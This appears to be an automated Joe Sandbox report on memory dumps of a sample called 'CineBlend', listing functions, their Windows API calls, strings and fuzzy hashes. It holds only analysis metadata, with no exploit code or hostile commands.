Instruction ID: 368bec15ac81a30a2822b095373991cde6f1b65d4585aece48cccc234f84db9a
Opcode Fuzzy Hash: a2cc86bd3f2da638105c71b1afd3d426c48386576b7c4778e66262b7b2106f1c
Instruction Fuzzy Hash: 29B1F37160C7029FC320DF28C890A7AB7E5FFA6724F50499DF59687292DB70D984CB92

Function 00BBBA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BBBBF8
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BBBC10
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BBBC34
_wcslen.LIBCMT ref: 00BBBC60
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BBBC74
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BBBC96
_wcslen.LIBCMT ref: 00BBBD92

Part of subcall function 00BA0F4E: GetStdHandle.KERNEL32(000000F6), ref: 00BA0F6D

_wcslen.LIBCMT ref: 00BBBDAB
_wcslen.LIBCMT ref: 00BBBDC6
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00BBBE16
GetLastError.KERNEL32(00000000), ref: 00BBBE67
CloseHandle.KERNEL32(?), ref: 00BBBE99
CloseHandle.KERNEL32(00000000), ref: 00BBBEAA
CloseHandle.KERNEL32(00000000), ref: 00BBBEBC
CloseHandle.KERNEL32(00000000), ref: 00BBBECE
CloseHandle.KERNEL32(?), ref: 00BBBF43

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: c18fb48e036a12edd935e1d349d2a9c43087740103dd56f6d96209eecd3e7add
Instruction ID: dea39157a4b8b0c1426151d2919f0248692b9d6e6e82ff395f79ecaa8b0efa06
Opcode Fuzzy Hash: c18fb48e036a12edd935e1d349d2a9c43087740103dd56f6d96209eecd3e7add
Instruction Fuzzy Hash: 5EF18B716087409FC714EF24C891FAABBE1EF85314F14899DF8859B2A2CBB1EC45CB52

Function 00BB4A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00BCDCD0), ref: 00BB4B18
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00BB4B2A
GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00BCDCD0), ref: 00BB4B4F
FreeLibrary.KERNEL32(00000000,?,00BCDCD0), ref: 00BB4B9B
StringFromGUID2.OLE32(?,?,00000028,?,00BCDCD0), ref: 00BB4C05
SysFreeString.OLEAUT32(00000009), ref: 00BB4CBF
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00BB4D25
SysFreeString.OLEAUT32(?), ref: 00BB4D4F

Strings

GetModuleHandleExW, xrefs: 00BB4B24
kernel32.dll, xrefs: 00BB4B13

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 354098117-199464113
Opcode ID: 7d2b1558a0d9fccbfd783ea14f13a1e79f966ccf64e3b3a50215f8ded829646f
Instruction ID: b7e21b749df6c0f2c3dc19ad3ad7426bee7c3cec1bc90c51cc18f3d2df297300
Opcode Fuzzy Hash: 7d2b1558a0d9fccbfd783ea14f13a1e79f966ccf64e3b3a50215f8ded829646f
Instruction Fuzzy Hash: 7A12F975A00115AFDB14DF94C884EBEBBF5FF49314F248098E909AB252DB71ED46CBA0

Function 00B3381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00C029C0), ref: 00B73F72
GetMenuItemCount.USER32(00C029C0), ref: 00B74022
GetCursorPos.USER32(?), ref: 00B74066
SetForegroundWindow.USER32(00000000), ref: 00B7406F
TrackPopupMenuEx.USER32(00C029C0,00000000,?,00000000,00000000,00000000), ref: 00B74082
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00B7408E

Strings

0, xrefs: 00B3382D

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 32bff75336e6d6476e237f473d8360138474c78426c7c431f748ea55afd91da6
Instruction ID: a55510547baa4cd3db28cae91d3cac8199a80e6d8eeed1458077b689c1b70199
Opcode Fuzzy Hash: 32bff75336e6d6476e237f473d8360138474c78426c7c431f748ea55afd91da6
Instruction Fuzzy Hash: 76710930645205BFEB219F29DC89FAABFE8FF04B64F204295F628AA1E0C7719950D750

Function 00BC7711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,?), ref: 00BC7823

Part of subcall function 00B38577: _wcslen.LIBCMT ref: 00B3858A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00BC7897
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00BC78B9
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BC78CC
DestroyWindow.USER32(?), ref: 00BC78ED
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00B30000,00000000), ref: 00BC791C
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BC7935
GetDesktopWindow.USER32 ref: 00BC794E
GetWindowRect.USER32(00000000), ref: 00BC7955
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00BC796D
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00BC7985

Part of subcall function 00B32234: GetWindowLongW.USER32(?,000000EB), ref: 00B32242

Strings

tooltips_class32, xrefs: 00BC7890, 00BC7915
0, xrefs: 00BC77D0

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 4b268fda2e10dd08593bd1038cd18ddb8a01910f6ef260dbdc9b5869ecf73086
Instruction ID: 8c7ea1059bc185d834d6fc908454f2b1f55a6580d884b1a20c30ca6306f252a5
Opcode Fuzzy Hash: 4b268fda2e10dd08593bd1038cd18ddb8a01910f6ef260dbdc9b5869ecf73086
Instruction Fuzzy Hash: A3717874148245AFD725CF18CC48F6ABBE9FB89304F1444AEF98587261CBB0E946CF22

Function 00BC9B7A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B324B0

DragQueryPoint.SHELL32(?,?), ref: 00BC9BA3

Part of subcall function 00BC80AE: ClientToScreen.USER32(?,?), ref: 00BC80D4
Part of subcall function 00BC80AE: GetWindowRect.USER32(?,?), ref: 00BC814A
Part of subcall function 00BC80AE: PtInRect.USER32(?,?,?), ref: 00BC815A

SendMessageW.USER32(?,000000B0,?,?), ref: 00BC9C0C
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00BC9C17
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00BC9C3A
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00BC9C81
SendMessageW.USER32(?,000000B0,?,?), ref: 00BC9C9A
SendMessageW.USER32(?,000000B1,?,?), ref: 00BC9CB1
SendMessageW.USER32(?,000000B1,?,?), ref: 00BC9CD3
DragFinish.SHELL32(?), ref: 00BC9CDA
DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00BC9DCD

Strings

@GUI_DRAGFILE, xrefs: 00BC9D7C
@GUI_DRAGID, xrefs: 00BC9D45
@GUI_DROPID, xrefs: 00BC9CFA

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: 22715876c1c7de507a56655b957b2e692075a905261084bd147f901fd9bf2f95
Instruction ID: 677226297d610bf6257660a9adbdf131c8fc2d9e647426ca0af8da5f14d81a46
Opcode Fuzzy Hash: 22715876c1c7de507a56655b957b2e692075a905261084bd147f901fd9bf2f95
Instruction Fuzzy Hash: 09616B71108305AFD705EF50CC89EAFBBE8EF88750F50096EF691931A1DB709A49CB52

Function 00BACEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00BACEF5
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00BACF08
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00BACF1C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00BACF35
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00BACF78
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00BACF8E
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BACF99
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00BACFC9
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00BAD021
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00BAD035
InternetCloseHandle.WININET(00000000), ref: 00BAD040

Strings

, xrefs: 00BACFBA

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 22b59911ec45245a5c0a25ea3d4e78aff5a2b9ca641588a932b2eb502465b9db
Instruction ID: c5c37d13509554bc374ba4297b3e18f660ee9f5c7c85a428e1558940ab354278
Opcode Fuzzy Hash: 22b59911ec45245a5c0a25ea3d4e78aff5a2b9ca641588a932b2eb502465b9db
Instruction Fuzzy Hash: 6F517CB5504608BFDB219F60C888EAB7BFCFF0A744F00446AF94697610DB35DD49ABA0

Function 00BC8FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00BC66D6,?,?), ref: 00BC8FEE
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00BC66D6,?,?,00000000,?), ref: 00BC8FFE
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00BC66D6,?,?,00000000,?), ref: 00BC9009
CloseHandle.KERNEL32(00000000,?,?,?,?,00BC66D6,?,?,00000000,?), ref: 00BC9016
GlobalLock.KERNEL32(00000000), ref: 00BC9024
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00BC66D6,?,?,00000000,?), ref: 00BC9033
GlobalUnlock.KERNEL32(00000000), ref: 00BC903C
CloseHandle.KERNEL32(00000000,?,?,?,?,00BC66D6,?,?,00000000,?), ref: 00BC9043
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00BC66D6,?,?,00000000,?), ref: 00BC9054
OleLoadPicture.OLEAUT32(?,00000000,00000000,00BD0C04,?), ref: 00BC906D
GlobalFree.KERNEL32(00000000), ref: 00BC907D
GetObjectW.GDI32(00000000,00000018,?), ref: 00BC909D
CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00BC90CD
DeleteObject.GDI32(00000000), ref: 00BC90F5
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00BC910B

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 05c1d5fe8b94746f77325a6381ba13d2974712bfb97158e3185336c8136a7f2b
Instruction ID: c14904fe00910e92eae64750e43827670932c80289c98db53087c2555f3a615b
Opcode Fuzzy Hash: 05c1d5fe8b94746f77325a6381ba13d2974712bfb97158e3185336c8136a7f2b
Instruction Fuzzy Hash: 3A41F879600208BFDB119F65DC8CEAABBB9FF89711F144069F915EB260DB709941DB20

Function 00BBC06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3B329: _wcslen.LIBCMT ref: 00B3B333

Part of subcall function 00BBD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BBC10E,?,?), ref: 00BBD415
Part of subcall function 00BBD3F8: _wcslen.LIBCMT ref: 00BBD451
Part of subcall function 00BBD3F8: _wcslen.LIBCMT ref: 00BBD4C8
Part of subcall function 00BBD3F8: _wcslen.LIBCMT ref: 00BBD4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BBC154
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BBC1D2
RegDeleteValueW.ADVAPI32(?,?), ref: 00BBC26A
RegCloseKey.ADVAPI32(?), ref: 00BBC2DE
RegCloseKey.ADVAPI32(?), ref: 00BBC2FC
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00BBC352
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00BBC364
RegDeleteKeyW.ADVAPI32(?,?), ref: 00BBC382
FreeLibrary.KERNEL32(00000000), ref: 00BBC3E3
RegCloseKey.ADVAPI32(00000000), ref: 00BBC3F4

Strings

RegDeleteKeyExW, xrefs: 00BBC35E
advapi32.dll, xrefs: 00BBC34D

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: b794e6778dee835d45923b6fd127fe526be086cfd92c580d934f320ca69db5e3
Instruction ID: a14a48432a384e65505c453edb754401d0df72f043f277d9e3431479bcf328f3
Opcode Fuzzy Hash: b794e6778dee835d45923b6fd127fe526be086cfd92c580d934f320ca69db5e3
Instruction Fuzzy Hash: 54C17D74204201AFD710DF28C495F6ABBE1FF84314F64849CF46A9B2A2CBB5ED46CB91

Function 00BB2FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00BB3035
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00BB3045
CreateCompatibleDC.GDI32(?), ref: 00BB3051
SelectObject.GDI32(00000000,?), ref: 00BB305E
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00BB30CA
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00BB3109
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00BB312D
SelectObject.GDI32(?,?), ref: 00BB3135
DeleteObject.GDI32(?), ref: 00BB313E
DeleteDC.GDI32(?), ref: 00BB3145
ReleaseDC.USER32(00000000,?), ref: 00BB3150

Strings

(, xrefs: 00BB30EA

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: a8f202f0c42c22d17146b994f503b3747c32536672570a88c7403f4c268f0d92
Instruction ID: 0ae145e89d838fc1ccdf348ebb9174ae4678e4d069781d364100e2f984da7f07
Opcode Fuzzy Hash: a8f202f0c42c22d17146b994f503b3747c32536672570a88c7403f4c268f0d92
Instruction Fuzzy Hash: A661F1B5D00219AFCB04CFA8D884EAEBBF5FF48710F208569E955A7210D771AA41CFA0

Function 00B6DDDD Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00B6DE21

Part of subcall function 00B6D9BC: _free.LIBCMT ref: 00B6D9D9
Part of subcall function 00B6D9BC: _free.LIBCMT ref: 00B6D9EB
Part of subcall function 00B6D9BC: _free.LIBCMT ref: 00B6D9FD
Part of subcall function 00B6D9BC: _free.LIBCMT ref: 00B6DA0F
Part of subcall function 00B6D9BC: _free.LIBCMT ref: 00B6DA21
Part of subcall function 00B6D9BC: _free.LIBCMT ref: 00B6DA33
Part of subcall function 00B6D9BC: _free.LIBCMT ref: 00B6DA45
Part of subcall function 00B6D9BC: _free.LIBCMT ref: 00B6DA57
Part of subcall function 00B6D9BC: _free.LIBCMT ref: 00B6DA69
Part of subcall function 00B6D9BC: _free.LIBCMT ref: 00B6DA7B
Part of subcall function 00B6D9BC: _free.LIBCMT ref: 00B6DA8D
Part of subcall function 00B6D9BC: _free.LIBCMT ref: 00B6DA9F
Part of subcall function 00B6D9BC: _free.LIBCMT ref: 00B6DAB1

_free.LIBCMT ref: 00B6DE16

Part of subcall function 00B62D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B6DB51,?,00000000,?,00000000,?,00B6DB78,?,00000007,?,?,00B6DF75,?), ref: 00B62D4E
Part of subcall function 00B62D38: GetLastError.KERNEL32(?,?,00B6DB51,?,00000000,?,00000000,?,00B6DB78,?,00000007,?,?,00B6DF75,?,?), ref: 00B62D60

_free.LIBCMT ref: 00B6DE38
_free.LIBCMT ref: 00B6DE4D
_free.LIBCMT ref: 00B6DE58
_free.LIBCMT ref: 00B6DE7A
_free.LIBCMT ref: 00B6DE8D
_free.LIBCMT ref: 00B6DE9B
_free.LIBCMT ref: 00B6DEA6
_free.LIBCMT ref: 00B6DEDE
_free.LIBCMT ref: 00B6DEE5
_free.LIBCMT ref: 00B6DF02
_free.LIBCMT ref: 00B6DF1A

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 65ec30fa1014301c04099e8dbf5ab6857a6ec14765433f4c79bc518daddd2d22
Instruction ID: d19c9d610d800e3f54673c8b0d6fe4f63df2781711febca3ba6d5f615f89d665
Opcode Fuzzy Hash: 65ec30fa1014301c04099e8dbf5ab6857a6ec14765433f4c79bc518daddd2d22
Instruction Fuzzy Hash: C9315C32B007059FEF21AB38D845B5A73E9EF21350F1448E9E459DB191DF7AAC40CB20

Function 00BCA94F Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 271windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B324B0

GetSystemMetrics.USER32(0000000F), ref: 00BCA990
GetSystemMetrics.USER32(00000011), ref: 00BCA9A7
GetSystemMetrics.USER32(00000004), ref: 00BCA9B3
GetSystemMetrics.USER32(0000000F), ref: 00BCA9C9
MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00BCAC15
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00BCAC33
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00BCAC54
ShowWindow.USER32(00000003,00000000), ref: 00BCAC73
InvalidateRect.USER32(?,00000000,00000001), ref: 00BCAC95
DefDlgProcW.USER32(?,00000005,?), ref: 00BCACBB

Strings

@, xrefs: 00BCABD0

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
String ID: @
API String ID: 3962739598-2766056989
Opcode ID: c2d73806b26c9cda5709508d5bee9be3393db76f4d6e6896169ab5a993421ee1
Instruction ID: 2b39c23be5f9dc1e76e8dc4cecfa63dbc45129de0939fe4162db77949025af4f
Opcode Fuzzy Hash: c2d73806b26c9cda5709508d5bee9be3393db76f4d6e6896169ab5a993421ee1
Instruction Fuzzy Hash: B1B16835600219DFDF14CF68C989BAE7BF2FF44708F1580A9ED49AB295DB70A980CB51

Function 00B952AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00B952E6
GetWindowTextW.USER32(?,?,00000400), ref: 00B95328
_wcslen.LIBCMT ref: 00B95339
CharUpperBuffW.USER32(?,00000000), ref: 00B95345
_wcsstr.LIBVCRUNTIME ref: 00B9537A
GetClassNameW.USER32(00000018,?,00000400), ref: 00B953B2
GetWindowTextW.USER32(?,?,00000400), ref: 00B953EB
GetClassNameW.USER32(00000018,?,00000400), ref: 00B95445
GetClassNameW.USER32(?,?,00000400), ref: 00B95477
GetWindowRect.USER32(?,?), ref: 00B954EF

Strings

ThumbnailClass, xrefs: 00B953BD, 00B95450

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 460079a1ab7323b5a65493751132cde8f36ce282675f9c4f8940530252682166
Instruction ID: 2933973d4906e24297ebbf80669f3a537ce6650c1407a3a041ecc5b314abe225
Opcode Fuzzy Hash: 460079a1ab7323b5a65493751132cde8f36ce282675f9c4f8940530252682166
